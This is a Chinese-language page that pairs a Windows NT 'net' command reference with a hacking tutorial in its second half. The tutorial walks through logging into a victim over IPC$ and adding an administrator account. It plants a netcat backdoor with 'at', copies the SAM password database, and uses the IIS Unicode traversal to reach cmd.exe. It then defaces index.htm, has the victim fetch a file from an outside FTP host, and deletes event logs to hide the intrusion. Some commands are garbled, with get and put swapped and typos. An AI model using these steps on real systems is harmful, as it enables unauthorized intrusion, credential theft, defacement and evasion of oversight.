網路指令之：net指令
 

許多 Windows NT 網路指令以 net 開始。這些 net 指令有一些公共內容：


通過按鍵輸入 net /? 可查閱所有可用的 net 指令。
通過按鍵輸入 net help 指令可在指令行中獲得 net 指令的語法說明 。例如，要得到 net accounts 指令的說明 ，請按鍵輸入 net help accounts。
所有 net 指令接受選項 / yes 和 /no（可縮寫為 / y 和 /n ）。/ y 對指令產生的任何交互提示自動回答「是」，/n 回答「否」。例如，net stop server 通常提示驗證是否根據服務器服務結束所有服務，net stop server /y 自動回答「是」並關閉服務器服務。

Net Accounts

更新用戶帳號資料庫、更改密碼及所有帳號的登入要求。必須要在更改帳號參數的電腦上執行網路登入服務。
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days |
unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
net accounts [/sync] [/domain]
參數
無
按鍵輸入不帶參數的 net accounts，將顯示當前密碼設定、登入時限及域訊息。


/forcelogoff:{minutes | no}
設定當用戶帳號或有效登入時間過期時，結束用戶和服務器會話前的等待時間。no 選項禁止強行登出。該參數的預設設定為 no。
指定 /forcelogoff:minutes 之後，Windows NT 在其強制用戶結束網路 minutes 分鍾之前，將給用戶發出警報。如果還有開啟的文件，Windows NT 將警告用戶。如果 minutes 小於兩分鍾，Windows NT 警告用戶立即從網路登出。


/minpwlen:length
設定用戶帳號密碼的最少字串數。允許範圍是 0-14，預設值為 6。


/maxpwage:{days | unlimited}
設定用戶帳號密碼有效的最大天數。unlimited 不設定最大天數。/maxpwage 選項的天數必須大於 /minpwage。允許範圍是 1-49,710 天 (unlimited)。預設值為 90 天。


/minpwage:days
設定用戶必須保持原密碼的最小天數。 0 值不設定最小時間。允許範圍是 0-49,710 天，預設值為 0 天。


/uniquepw:number
要求用戶更改密碼時，必須在經過 number 次後，才能重複使用與之相同的密碼。允許範圍是 0-8。預設值為 5。


/domain
在當前域的主域控制器上執行該操作。否則只在本地機電腦執行操作。
該參數僅用於 Windows NT Server 域中的 Windows NT Workstation 電腦，Windows NT Server 電腦預設為在主域控制器執行操作。


/sync
當用於主域控制器時，該指令使域中所有製作制作備份域控制器同步；當用於製作制作備份域控制器時，該指令僅使該製作制作備份域控制器與主域控制器同步。該指令僅適用於 Windows NT Server 域成員的電腦。

Net Computer

從域資料庫中增加或移除電腦。該指令僅在執行 Windows NT Server 的電腦上可用。
net computer \computername {/add | /del}
參數

\computername
指定要增加到域或從域中移除的電腦。

/add
將指定電腦增加到域。

/del
將指定電腦從域中移除。


Net Config

顯示當前執行的可組態服務，或顯示並更改某項服務的設定。
net config [service [options]]

參數
無
按鍵輸入不帶參數的 net config 將顯示可組態服務的列表。

service
通過 net config 指令進行組態的服務（server 或 workstation）。

options
服務的特定選項。完整語法請參閱 net config server 或 net config workstation。


Net Config Server

執行服務時顯示或更改伺服器的服務設定。
net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes | no}]
參數
無
按鍵輸入不帶參數的 net config server，將顯示伺服器服務的當前組態。

/autodisconnect:time
設定中斷連線前用戶會話閒置的最大時間值。可以指定 -1，表示永不中斷連線連接。允許範圍是 -1-65535 分鍾，預設值是 15 分鍾。

/srvcomment:"text "
為伺服器增加註釋，可以通過 net view 指令在螢幕上顯示所加註釋。註釋最多可達 48 個字串，文字要用引號引住。

/hidden:{yes | no}
指定伺服器的電腦名稱是否出現在伺服器列表中。請注意隱含某個伺服器並不改變該伺服器的權限。預設為 no。


Net Config Workstation

服務執行時，顯示或更改工作站各項服務的設定。
net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
參數
無
按鍵輸入不帶參數的 net config workstation 將顯示本機電腦的當前組態。

/charcount:bytes
指定 Windows NT 在將資料傳送到通訊設備之前收集的資料量。如果同時設定 /chartime:msec 參數，Windows NT 按首先滿足條件的選項執行。允許範圍是 0-65535 字元，預設值是16 字元。

/chartime:msec
指定 Windows NT 在將資料傳送到通訊設備之前收集資料的時間。如果同時設定 /charcount:bytes 參數，Windows NT 按首先滿足條件的選項執行。允許範圍是 0-65535000 毫秒，預設值是 250 毫秒。

/charwait:sec
設定 Windows NT 等待通訊設備變為可用的時間。允許的範圍是 0-65535 秒，預設值是 3600 秒。


Net Continue

重新啟動掛起的服務。
net continue service
參數

service
能夠繼續執行的服務，包括： file server for macintosh（該服務僅限於 Windows NT Server）, ftp publishing service, lpdsvc, net logon, network dde，network dde dsdm，nt lm security support provider，remoteboot（該服務僅限於 Windows NT Server），remote access server, schedule，server，simple tcp/ip services 及 workstation 。


Net File

顯示某伺服器上所有開啟的共享檔案名及鎖定文件數。該指令也可以關閉個別文件並取消文 件鎖定。
net file [id [/close]]
參數
無
按鍵輸入不帶參數的 net file 可獲得伺服器上開啟文件的列表。

id
文件標幟號。

/close
關閉開啟的文件並解壓縮鎖定記錄。請從共享文件的伺服器中按鍵輸入該指令。


Net Group

在 Windows NT Server 域中增加、顯示或更改全局組。該指令僅在 Windows NT Server 域中可用。
net group [groupname [/comment:"text "]] [/domain]
net group groupname {/add [/comment:"text "] | /delete} [/domain]
net group groupname username [ ...] {/add | /delete} [/domain]
參數
無
按鍵輸入不帶參數的 net group 可以顯示伺服器名稱及伺服器的群組名稱。

groupname
要增加、增強或移除的組。僅提供某個組名便可檢視組中的用戶列表。

/comment:"text "
為新增組或現有組增加註釋。註釋最多可以是 48 個字串，並用引號將註釋文字引住。

/domain
在當前域的主域控制器中執行該操作，否則在本機電腦上執行操作。 該參數僅用於作為 Windows NT Server 域成員的 Windows NT Workstation 電腦。Windows NT Server 電腦預設為在主域控制器中操作。

username[ ...]
列表顯示要增加到組或從組中移除的一個或多個用戶。使用空格分隔多個用戶名稱項。

/add
增加組或在組中增加用戶名。必須使用該指令為增加到組中的用戶建立帳號。

/delete
移除組或從組中移除用戶名。

Net Help

提供網路指令列表及說明主題，或提供指定指令或主題的說明 。可用網路指令列於 N 下面的「指令參考」中「指令」視窗內。
net help [command]
net command {/help | /?}
參數
無
按鍵輸入不帶參數的 net help 顯示能夠獲得說明 的指令列表和說明主題。

command
需要其說明 的指令，不要將 net 作為 command 的一部分。

/help
提供顯示說明 文本方式選項。

/?
顯示指令的正確語法。


Net Helpmsg

提供 Windows NT 錯誤訊息的說明 。
net helpmsg message#
參數
message#
需要其說明 的 Windows NT 消息的四位程式碼。


Net Localgroup

增加、顯示或更改本機組。
net localgroup [groupname [/comment:"text "]] [/domain]
net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
net localgroup groupname name [ ...] {/add | /delete} [/domain]
參數
無
按鍵輸入不帶參數的 net localgroup 將顯示伺服器名稱和電腦的本機群組名稱。

groupname
要增加、擴充或移除的本機群組名稱。只提供 groupname 即可檢視用戶列表或本機組中的全局組。

/comment: "text "
為新增或現有組增加註釋。註釋文字的最大長度是 48 個字串，並用引號引住。

/domain
在當前域的主域控制器中執行操作，否則僅在本機電腦上執行操作。該參數僅套用於 Windows NT Server 域中的 Windows NT Workstation 電腦。Windows NT Server 電腦預設為在主域控制器中操作。

name [ ...]
列出要增加到本機組或從本機組中移除的一個或多個用戶名或組名，多個用戶名或組名之間以空格分隔。可以是本機用戶、其他域用戶或全局組，但不能是其他本機組。如果是其他域的用戶，要在用戶名前加域名（例如，SALESRALPHR）。

/add
將全局組名或用戶名增加到本機組中。在使用該指令將用戶或全局組增加到本機組之前，必須為其建立帳號。

/delete
從本機組中移除組名或用戶名。


Net Name

增加或移除消息名（有時也稱別名），或顯示電腦接收消息的名稱列表。要使用 net name 指令，電腦中必須執行信使服務。
net name [name [/add | /delete]]
參數
無
按鍵輸入不帶參數的 net name 將列出當前使用的名稱。

name
指定接收消息的名稱。名稱最多為 15 個字串。

/add
將名稱增加到電腦中。 /add 是可選項，按鍵輸入 net name name 與按鍵輸入 net name name /add 相同。

/delete
從電腦中移除名稱。

Net Pause

暫停正在執行的服務。
net pause service
參數
service
指下列服務： file server for macintosh（僅限於 Windows NT Server）、ftp publishing service、lpdsvc、netlogon、network dde、network dde dsdm、nt lm security support provider、remoteboot（僅限於 Windows NT Server）、remote access server、sch
edule、server、simple tcp/ip services 或 workstation 。


Net Print

顯示或控制列印作業及列印貯列。
net print computername sharename
net print [computername ] job# [/hold | /release | /delete]
參數

computername
共享列印機貯列的電腦名稱。

sharename
列印貯列名稱。當包含 computername 與 sharename 時，使用反斜槓 () 將它們分開。

job#
在列印機貯列中分配給列印作業的標幟號。有一個或多個列印機貯列的電腦為每個列印作業分配唯一標幟號。如果某個作業號用於共享列印機貯列中，則不能指定給其他作業，也不能分配給其他列印機貯列中的作業。

/hold
使用 job# 時，在列印機貯列中使列印作業等待。列印作業停留在列印機貯列中，並且其他列印作業只能等到解壓縮該作業之後才能進入。

/release
解壓縮保留的列印作業。

/delete
從列印機貯列中移除列印作業。


Net Send

向網路的其他用戶、電腦或通信名傳送消息。要接收消息必須執行信使服務。
net send {name | * | /domain[:name] | /users} message
參數

name
要接收傳送消息的用戶名、電腦名稱或通信名。如果電腦名稱包含空字串，則要將其用引號(" ") 引住。

*
將消息傳送到組中所有名稱。

/domain[:name]
將消息傳送到電腦域中的所有名稱。如果指定 name，則消息將傳送到指定域或組中的所有名稱。

/users
將消息傳送到與伺服器連接的所有用戶。

message
作為消息傳送的文本。


Net Session

列出或中斷連線本機電腦和與之連接的客戶端的會話。
net session [computername] [/delete]
參數
無
按鍵輸入不帶參數的 net session 可以顯示所有與本機電腦的會話的訊息。

computername
標幟要列出或中斷連線會話的電腦。

/delete
結束與 computername 電腦會話並關閉本次會話期間電腦的所有開啟文件。如果省略computername 參數，將取消與本機電腦的所有會話。


Net Share

新增、移除或顯示共享資源。
net share sharename
net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
net share sharename [/users:number | unlimited] [/remark:"text"]
net share {sharename | drive:path} /delete
參數
無
按鍵輸入不帶參數的 net share 將顯示本機電腦上所有共享資源的訊息。

sharename
是共享資源的網路名稱。按鍵輸入帶 sharename 的 net share 指令，只顯示該共享訊息。

drive:path
指定共享目錄的絕對路徑。

/users:number
設定可同時訪問共享資源的最大用戶數。

/unlimited
不限制同時訪問共享資源的用戶數。

/remark:"text "
增加關於資源的註釋，註釋文字用引號引住。

/delete
停止共享資源。


Net Start

啟動服務，或顯示已啟動服務的列表。如果服務名是兩個或兩個以上的詞，如 Net Logon 或Computer Browser，則必須用引號 (") 引住。.
net start [service]
參數
無
按鍵輸入不帶參數的 net start 則顯示執行服務的列表。

service
包括下列服務： alerter、client service for netware、clipbook server、computer browser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitoring agent 、nt lm security support provider 、ole 、remote access connection manager 、remote access isnsap service 、remote access server 、remote procedure call (rpc) locator 、remote procedure call (rpc) service 、schedule 、server 、simple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation。

下列服務僅在 Windows NT Server 下可用：file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service 。


Net Statistics

顯示本機工作站或伺服器服務的統計記錄。
net statistics [workstation | server]
參數
無
按鍵輸入不帶參數的 net statistics 將列出其統計訊息可用的執行服務。

workstation
顯示本機工作站服務的統計訊息。

server
顯示本機伺服器服務的統計訊息。

Net Stop

停止 Windows NT 網路服務。
net stop service
參數

service
包括下列服務： alerter（警報）、client service for netware（Netware 客戶端服務）、clipbook server（剪貼簿伺服器）、computer browser（電腦瀏覽器）、directory replicator（目錄複製器）、ftp publishing service (ftp )（ftp 發行服務）、lpdsvc、messenger（信使）、net logon（網路登入）、network dde（網路 dde）、network dde dsdm（網路 dde dsdm）、network monitor agent（網路監控代理）、nt lm security support provider（NT LM 安全性支持提供）、ole（對像連接與嵌入）、remote access connection manager（遠端訪問連接管理器）、remote access isnsap service（遠端訪問 isnsap 服務）、remote access server（遠端訪問伺服器）、remote procedure call (rpc) locator（遠端程序使用定位器）、remote procedure call (rpc) service（遠端程序使用服務）、schedule（調度）、server（伺服器）、simple tcp/ip services（簡單 TCP/IP 服務）、snmp、spooler（後台列印程序）、tcp/ip netbios helper（TCP/IP NETBIOS 協助工具）、ups 及 workstation（工作站）。

下列服務僅在 Windows NT Server 中可用： file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service。


Net Time

使電腦的時鍾與另一台電腦或域的時間同步。不帶 /set 參數使用時，將顯示另一台電腦或域的時間。

net time [computername | /domain[:name]] [/set]
參數
computername
要檢查或同步的伺服器名。
/domain[:name]
指定要與其時間同步的域。
/set
使本電腦時鍾與指定電腦或域的時鍾同步。


Net Use

連接電腦或中斷連線電腦與共享資源的連接，或顯示電腦的連接訊息。該指令也控制永久網路連接。

net use [devicename | *] [computernamesharename[volume]] [password | *]] [/user :[domainname]username] [[/delete] | [/persistent:{yes | no}]]
net use devicename [/home[password | *]] [/delete:{yes | no}]
net use [/persistent:{yes | no}]
參數
無
按鍵輸入不帶參數的 net use 將列出網路連接。

devicename
指定要連線到的資源名稱或要中斷連線的設備名稱。有兩類設備名：磁碟機（D: 到 Z:）和列印機（LPT1: 到 LPT3）。若按鍵輸入星號而不是指定設備名將分配下一個可用設備名。

computernamesharename

伺服器及共享資源的名稱。如果電腦名稱包含空白字串，要用引號 (" ") 將雙反斜線及電腦名稱引住。電腦名稱長度可以是 1-15 個字串。

volume
指定伺服器上的 NetWare 磁碟區。要連線到 NetWare 伺服器，必須安裝並執行 NetWare 客戶端機服務 (Windows NT Workstation) 或 NetWare 網路閘道服務 (Windows NT Server)。

password
訪問共享資源的密碼。

*
提示按鍵輸入密碼。在密碼提示行中按鍵輸入密碼時，將不顯示該密碼。

/user
指定進行連接的另外一個用戶。

domainname
指定另一個域。例如 net use d: servershare /user:adminmariel 連接用戶 mariel，如同從 admin 域連接一樣。如果省略域，將使用當前登入域。

username
指定登入的用戶名。

/home
將用戶連線到其宿主目錄。

/delete
取消指定網路連接。如果用戶以星號指定連接，則取消所有網路連接。

/persistent
控制永久網路連接的使用。預設為上次使用的設定。無設備的連接不是永久的。

yes
儲存建立的所有連接，並在下次登入時還原。

no
不儲存建立的連接和繼發連接，並在下次登入時還原現有連接。使用 /delete 開關項取消永久連接。


Net User

增加或更改用戶帳號或顯示用戶帳號訊息。
net user [username [password | *] [options]] [/domain]
net user username {password | *} /add [options] [/domain]
net user username [/delete] [/domain]
參數
無
按鍵輸入不帶參數的 net user 將檢視電腦上的用戶帳號列表。

username
增加、移除、更改或檢視用戶帳號名。用戶帳號名最多可以有 20 個字串。

password
為用戶帳號分配或更改密碼。密碼必須滿足在 net accounts 指令 /minpwlen 選項中設定的最小參數。最多是 14 個字串。

*
提示輸入密碼。在密碼提示行中按鍵輸入密碼時，將不顯示該密碼。

/domain
在電腦主域的主域控制器中執行操作。
該參數僅在 Windows NT Server 域成員的 Windows NT Workstation 電腦上可用。預設情況下，Windows NT Server 電腦在主域控制器中執行操作。
注意：在電腦主域的主域控制器發生該動作。它可能不是登入域。

/add
將用戶帳號增加到用戶帳號資料庫。

/delete
從用戶帳號資料庫中移除用戶帳號。

選項如下所顯示：
/active:{no | yes}
啟用或禁止用戶帳號。如果不啟動用戶帳號，用戶就不能訪問電腦上的資源。預設值是 yes （啟動）。

/comment:"text"
提供用戶帳號的註釋。該註釋最多可以有 48 個字串，文字用引號引住。

/countrycode:nnn
使用操作系統的國家程式碼以便為用戶說明 和錯誤訊息文件提供指定語言文件。0 值表示預設國家程式碼。

/expires:{date | never}
如果設定 date，將導致用戶帳號過期，never 不對用戶帳號設定時間限制。過期日期根據
/countrycode 值可以是下列格式： mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帳號在指定日期開始時過期。月份可以是數位、全名或三個字母的簡拼。年可以是兩位或四位數，使用逗號或斜線（不要用空格） 區分日期的各部分。如果省略 yy ，則使用該日期下一次到來的年份（根據電腦的時鍾）。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之間輸入下列日期項，那它們相同：jan,91/9/95 january,9,1995 1/9

/fullname:"name"
指定用戶全名而不是用戶名。用引號將名字引住。

/homedir:path
設定用戶宿主目錄的路徑。該路徑必須存在。

/homedirreq:{yes | no}
設定是否需要宿主目錄。

/passwordchg:{yes | no}
指定用戶是否能改變自己的密碼。預設值是 yes。

/passwordreq:{yes | no}
指定用戶帳號是否需要密碼，預設值是 yes。

/profilepath:[path]
設定用戶登入組態文件的路徑。該路徑名指向註冊表組態文件。

/scriptpath:path
為用戶登入指令碼設定路徑。Path 不能是絕對路徑；path 是相對於 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相對路徑：。

/times:{times | all}
指定允許用戶使用電腦的時間。times 值表示為 day[-day][, day[-day]] , time[-time][, time[-time]], 增量限制為一小時。Days 可以是全名或簡寫（M、T、W、Th、F、Sa、Su）。Hours 可以是 12 小時制或 24 小時制。對於 12 小時值，使用 AM、PM 或 A.M、P.M 。all 表示用戶總可以登入。空值表示用戶永遠不能登入。用逗號分隔日期和時間，分隔時間和日期的服務機構用分號（例如 M,4AM-5PM; T,1PM-3PM）。指定 /times 時不要使用空格。

/usercomment:"text "
讓管理員增加或更改帳號的「用戶註釋」。用引號引住文字。

/workstations:{computername[,...] | *}
列出最多八個用戶可以登入到網路的工作站。用逗號分隔列表中的多個項。如果 /workstations 沒有列表，或如果列表是星號「*」，則用戶可以從任何一台電腦登入。


Net View

顯示域列表、電腦列表或指定電腦的共享資源列表。
net view [computername | /domain[:domainname]]
net view /network:nw [computername]
參數
無
按鍵輸入不帶參數的 net view 將顯示當前域的電腦列表。

computername
指定要檢視其共享資源的電腦。

/domain[:domainname]
指定要檢視其可用電腦的域。如果省略 domainname ，則顯示網路的所有域。

/network:nw
顯示 NetWare 網路中所有可用的伺服器。如果指定電腦名稱，則顯示 NetWare 網路中該電腦的可用資源。也可以用此開關指定增加到系統中的其他網路。

簡單範例網路入侵&網路使用指令

1：NET

如果你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！

這裡我們假如你得到的用戶是hbx，密碼是123456。假設對方IP為127.0.0.1

net use \\127.0.0.1\ipc$ 123456 /user:hbx

結束的指令是

net use \\127.0.0.1\ipc$ /delte

下面的操作你必須登入後才可以用.登入的方法就在上面.

----------------------

下面講怎麼新增一個用戶，由於SA的權限相當於系統的超級用戶.

我們加一個heibai的用戶密碼為lovechina

net user heibai lovechina /add

只要顯示指令成功，那麼我們可以把他加入Administrator組了.

net localgroup Administrators heibai /add

----------------------

這裡是講映射對方的C碟，當然其他盤也可以，只要存在就行了.我們這裡把對方的C碟映射到本機的Z盤.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

這樣可以開啟對方的TELNET服務.

----------------------

這裡是將Guest用戶啟動，guest是NT的預設用戶，而且無法移除呢？不知道是否這樣，我的2000就是移除不了它。

net user guest /active:yes

----------------------

這裡是把一個用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。只要有權限就行了呀！

net user guest lovechina

2:at
一般一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麼啟動他呢？

那麼需要用AT指令，這裡假設你已經登入了那個伺服器。

你首先要得到對方的時間，

net time \\127.0.0.1

將會返回一個時間，這裡假設時間為12:1，現在需要新增一個作業，其ID=1

at \\127.0.0.1 12:3 nc.exe

這裡假設了一個木馬，名為NC.EXE，這個東西要在對方伺服器上.

這裡介紹一下NC，NC是NETCAT的簡稱，為了方便輸入，一般會被改名.它是一個TELNET服務，連接阜為99.

等到了12:3就可以連線到對方的99連接阜.這樣就給對方種下了木馬.

3:telnet

這個指令非常實用，它可以與遠方做連接，不過正常下需要密碼、用戶，不過你給對方種了木馬，直接連到這個木馬開啟的連接阜.

telnet 127.0.0.1 99

這樣就可以連到對方的99連接阜.那你就可以在對方執行指令了，這個也就是目標物.

4:FTP

它可以將你的東西傳到對方電腦上，你可以去申請個支持FTP上傳的空間，國內多的是，如果真的找不到，我給個www.51.NET，不錯的.當我們申請完後，它會給用戶名，密碼，以及FTP伺服器.

在上傳前需要登入先，這裡我們假設FTP伺服器是www.51.NET，用戶名是HUCJS，密碼是654321

ftp http://www.51.net

他會要求輸入用戶，成功後會要求輸入密碼.

下面先說上傳，假設你需上傳的文件是INDEX.HTM，它位於C:\下，傳到對方D:\

get c:\index.htm d:\

假設你要把對方C碟下的INDEX.HTM，下到你的電腦的D碟下

put c:\index.htm d:\

5:copy
下面我說說怎樣把本機的文件複製到對方硬碟上去，需要建立好IPC$連接才有效。

這裡我們把本機C碟下的index.htm複製到127.0.0.1的C碟下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要複製到D碟下把C改為D，就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他複製到WINNT目錄裡

就要把輸入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把對方的文件複製過來，順便告訴大家NT的制作備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的檔案名

下面就把127.0.0.1的資料庫複製到本機C碟下

copy \\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6：set
如果你跑進了一部電腦，而且想黑他（這思想只能在特別時候才准有），當然他的80連接阜要開，不然你黑給誰看。這時需要用SET指令！

下面是我得到的結果！我來分析它，只是找主頁在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登入者的IP，這裡本來是顯示我的IP，被我移除了
HTTP_ACCEPT_ENCODING=gzip， deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的位址，只要你看到PATH_TRANSLATED=的後面就是主頁的存放位址。這裡是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉紅色的那行就是對方主頁存放位址，這裡告訴大家一個技巧，很笨的技巧啊，不過只能用這個方法才能100%的找到主頁的名稱，當你DIR這個目錄時，一定會看到很多文件，你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/檔案名，這樣只要看到和XX.XX.XX.XX看到的也面一模一樣，那麼這就是主頁的名稱了。

8：Shutdown

關了對方的NT伺服器的指令

Shutdown \\IP位址 t:20

20秒後將NT自動關閉，三思後才能執行這個指令，這樣對對方造很大的損失，要做個有良心的入侵者呀。

9：DIR

這個指令沒什麼好講，但是卻非常重要，他是檢視一目錄裡的所有文件、資料夾。

你可以本機試下。

10：echo

著名的漏洞Unicode，這個指令可以簡單的黑一下有這個漏洞的主機。

我們假設我們要把「南京大屠殺鐵證如山，任何日本人不得抵賴！」寫入index.htm，有2種方法，大家看看有什麼區別。

echo 南京大屠殺鐵證如山，任何日本人不得抵賴?gt;index.htm

echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>>index.htm

第一個的意思是覆蓋index.htm原有的內容，把「南京大屠殺鐵證如山，任何日本人不得抵賴！」寫進index.htm。

第二個的意思是把「南京大屠殺鐵證如山，任何日本人不得抵賴！」加到index.htm裡面。

「>>」產生的內容將追加進文件中，「>」則將原文件內容覆蓋。

大家可以本機試下。

可能你會問，這樣簡單黑下有什麼好玩的，其實他可以用來下載主頁到對方的目錄裡。

1、首先，我們需要申請一個免費的主頁空間。

2、用echo在可寫目錄下建立如下內容的txt文件：（以chinren伺服器為例。）
open upload.chinaren.com（你的FTP伺服器，申請時你的空間提供商會給你的）
cnhack（你申請時的用戶名）
test（你申請時的密碼）
get index.htm c:\inetpub\wwwroot\index.htm（這裡是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm）
bye（結束FTP對話，相當在98下的DOS，用EXIT結束DOS）

具體的做法：
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt （利用ftp的-s參數，執行文件裡的內容。）

等指令完成時，文件已經下載到你指定的文件裡了。

注意：取得文件後，請移除cnhack.txt。（如果不移除，很容易會給別人看到你的密碼。）

記得要 del c:\cnhack.txt

11:attrib

這個指令是設定文件內容的。如果你想黑一個站，而他的主頁的文件內容設定了只讀，那就很可憐呀，想移除他也不行，想覆蓋他也不行。倒！不過有這個指令就別怕了。

attrib -r index.htm

這個指令是把index.htm的只讀內容去掉。

如果把「-」改為「+」則是把這個文件的內容設定為只讀

----------------------

attrib +r index.htm

這個指令是把index.htm的內容設定為只讀。

12:el

當你看到這個標題可別倒下啊！現在要離開127.0.0.1了，要移除日誌，當然要移除日誌啦！想被捉嗎。哈哈。

NT的日誌有這些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要移除這些就可以了。有些系統NT安裝在D碟或其他盤，就要把C改成其他盤。

完畢